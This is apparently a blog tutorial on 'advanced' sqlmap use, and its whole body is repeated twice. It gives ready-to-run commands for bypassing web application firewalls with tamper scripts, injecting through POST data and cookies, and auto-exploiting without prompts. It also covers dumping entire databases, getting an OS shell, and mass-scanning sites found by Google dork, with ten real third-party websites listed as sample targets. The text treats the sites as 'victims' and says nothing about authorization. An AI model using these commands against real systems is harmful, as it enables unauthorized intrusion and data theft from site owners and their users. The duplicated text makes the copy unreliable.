Advanced Sqlmap - Metasploit for SQL Injection.
[?] What is SQL Injection?
I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection
[?] Why we use sqlmap?
- This is a automatic SQL injection tool.
- Provide many advanced technique that I'll show you in this post.
- Open source and highly scalable.
- Easy to install.
[*] Sqlmap source https://github.com/sqlmapproject/sqlmap
All you need is python 2.x and Internet connection:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[*] Well, now I'm gonna show you some advanced technique.
[Bypass WAF using sqlmap tamper script]
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs
You can also use more tamper script but it depend on your victim DBMS. (use too much tamper script is not RECOMMEND)
Here is some tamper script for specific DBMS:
- General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
[Run sqlmap with custom position and POST request]
So what if your target URL is: http://example.com/post/123
How can we use -p option in sqlmap? Just add an '*' to indicate position that you want to inject sqlmap payload.
python sqlmap.py -u 'http://example.com/post/123*’ --dbs
Or even POST request like this:
POST /login.php HTTP/1.1
Host: example.com
user=admin&pass=supersecret
Save that POST request to a file, for example request.txt
python sqlmap.py -r request.txt -p 'user' --dbs
You can also place '*' in everywhere in request.txt and run sqlmap. (for example cookie injection :D)
[Running sqlmap without interact]
Normally when you run sqlmap, you'll get some question from sqlmap like this:
This is useful but sometimes bother you. So run command below will help you with that.
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --batch
--batch : use the default behaviour, for example:
it is not recommended -- [snip] -- Do you want to skip? [Y/n]
In this case 'Y' is default and use --batch option will skip that question and use 'Y'
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --answer="extending=N,follow=N,keep=N,exploit=Y"
You can also use --answer option to pre-answer some question.
- extending: increase level and risk.
- follow: follow redirection.
- keep: keep running or not if connection timeout.
- exploit: exploit or not if target exploitable.
[Running sqlmap with Google Dork]
Google dork for sql injection: https://www.exploit-db.com/google-hacking-database/14/
In this post I'm gonna use: inurl:"article.php?id=" just for a demo.
python sqlmap.py -g 'inurl:"article.php?id="' --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --dbs --thread 5
You can even running sqlmap with list of link from Google Dork.
--[snip]--
https://www.avilas-style.com/shop/article.php?id=3003
poedb.tw/article.php?id=Ascendancy
www.treadofpioneers.org/article.php?id=15
www.weicards.com/article.php?id=4
https://www.viewsonic.com/tw/support/article.php?id=269
www.irentals.cn/article.php?id=144
www.observer-taipei.com/article.php?id=1389
www.havemary.com/article.php?id=4465
www.taitungbb.com.tw/article.php?id=28
https://www.earthobservations.org/article.php?id=218
--[snip]--
Save that file in simple.txt and use the command below:
python sqlmap.py -m simple.txt --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --thread 5 --dbs --output-dir="/tmp/data-sqli/"
-m: file that contain links need to test.
--output-dir: custom place output of sqlmap session (default is '.sqlmap/output/')
So what if we crawl all the link from Google Dork to running sqlmap(use Burp Suite or custom python script).
I already created a python script to do that shit :D.
[Running sqlmap with Burp Suite]
You need to install SQLiPy extension on Burp, check it out on official Burp Suite site
https://support.portswigger.net/customer/en/portal/articles/2791040-using-burp-with-sqlmap
Run sqlmapapi server:
python sqlmapapi.py -s -H <IP> -p <Port>
For instance:
python sqlmapapi.py -s -H 127.0.0.1 -p 8775
Send request to SQLiPy and you good to go.
[Some technique to dump data from vulnerable target]
Enumerate DBMS databases:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dbs
Dump all DBMS databases tables entries:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dump-all
Enumerate DBMS database tables:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb --tables
Dump data from specific database or talbes:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb -T sometable --dump
[Some other advanced technique]
Show advanced help:
python sqlmap.py -hh
Specific DBMS:
--dbms: specific DBMS to save your time (e.g --dbms=mysql)
Revershell with sqlmap:
--os-shell: revershsell by upload UDF function (not work with all case)
Custom sql query:
--sql-shell: Prompt for an interactive SQL shell (basically you can run any sql query)
[?] What is SQL Injection?
I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection
[?] Why we use sqlmap?
- This is a automatic SQL injection tool.
- Provide many advanced technique that I'll show you in this post.
- Open source and highly scalable.
- Easy to install.
[*] Sqlmap source https://github.com/sqlmapproject/sqlmap
All you need is python 2.x and Internet connection:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[*] Well, now I'm gonna show you some advanced technique.
[Bypass WAF using sqlmap tamper script]
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs
You can also use more tamper script but it depend on your victim DBMS. (use too much tamper script is not RECOMMEND)
Here is some tamper script for specific DBMS:
- General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
[Run sqlmap with custom position and POST request]
So what if your target URL is: http://example.com/post/123
How can we use -p option in sqlmap? Just add an '*' to indicate position that you want to inject sqlmap payload.
python sqlmap.py -u 'http://example.com/post/123*’ --dbs
Or even POST request like this:
POST /login.php HTTP/1.1
Host: example.com
user=admin&pass=supersecret
Save that POST request to a file, for example request.txt
python sqlmap.py -r request.txt -p 'user' --dbs
You can also place '*' in everywhere in request.txt and run sqlmap. (for example cookie injection :D)
[Running sqlmap without interact]
Normally when you run sqlmap, you'll get some question from sqlmap like this:
This is useful but sometimes bother you. So run command below will help you with that.
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --batch
--batch : use the default behaviour, for example:
it is not recommended -- [snip] -- Do you want to skip? [Y/n]
In this case 'Y' is default and use --batch option will skip that question and use 'Y'
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --answer="extending=N,follow=N,keep=N,exploit=Y"
You can also use --answer option to pre-answer some question.
- extending: increase level and risk.
- follow: follow redirection.
- keep: keep running or not if connection timeout.
- exploit: exploit or not if target exploitable.
[Running sqlmap with Google Dork]
Google dork for sql injection: https://www.exploit-db.com/google-hacking-database/14/
In this post I'm gonna use: inurl:"article.php?id=" just for a demo.
python sqlmap.py -g 'inurl:"article.php?id="' --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --dbs --thread 5
You can even running sqlmap with list of link from Google Dork.
--[snip]--
https://www.avilas-style.com/shop/article.php?id=3003
poedb.tw/article.php?id=Ascendancy
www.treadofpioneers.org/article.php?id=15
www.weicards.com/article.php?id=4
https://www.viewsonic.com/tw/support/article.php?id=269
www.irentals.cn/article.php?id=144
www.observer-taipei.com/article.php?id=1389
www.havemary.com/article.php?id=4465
www.taitungbb.com.tw/article.php?id=28
https://www.earthobservations.org/article.php?id=218
--[snip]--
Save that file in simple.txt and use the command below:
python sqlmap.py -m simple.txt --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --thread 5 --dbs --output-dir="/tmp/data-sqli/"
-m: file that contain links need to test.
--output-dir: custom place output of sqlmap session (default is '.sqlmap/output/')
So what if we crawl all the link from Google Dork to running sqlmap(use Burp Suite or custom python script).
I already created a python script to do that shit :D.
[Running sqlmap with Burp Suite]
You need to install SQLiPy extension on Burp, check it out on official Burp Suite site
https://support.portswigger.net/customer/en/portal/articles/2791040-using-burp-with-sqlmap
Run sqlmapapi server:
python sqlmapapi.py -s -H <IP> -p <Port>
For instance:
python sqlmapapi.py -s -H 127.0.0.1 -p 8775
Send request to SQLiPy and you good to go.
[Some technique to dump data from vulnerable target]
Enumerate DBMS databases:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dbs
Dump all DBMS databases tables entries:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --dump-all
Enumerate DBMS database tables:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb --tables
Dump data from specific database or talbes:
python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' -D somedb -T sometable --dump
[Some other advanced technique]
Show advanced help:
python sqlmap.py -hh
Specific DBMS:
--dbms: specific DBMS to save your time (e.g --dbms=mysql)
Revershell with sqlmap:
--os-shell: revershsell by upload UDF function (not work with all case)
Custom sql query:
--sql-shell: Prompt for an interactive SQL shell (basically you can run any sql query)
I was really excited about your daily updates. If you have new update me.
ReplyDeletePHP Institutes in Chennai
PHP Training Center in Chennai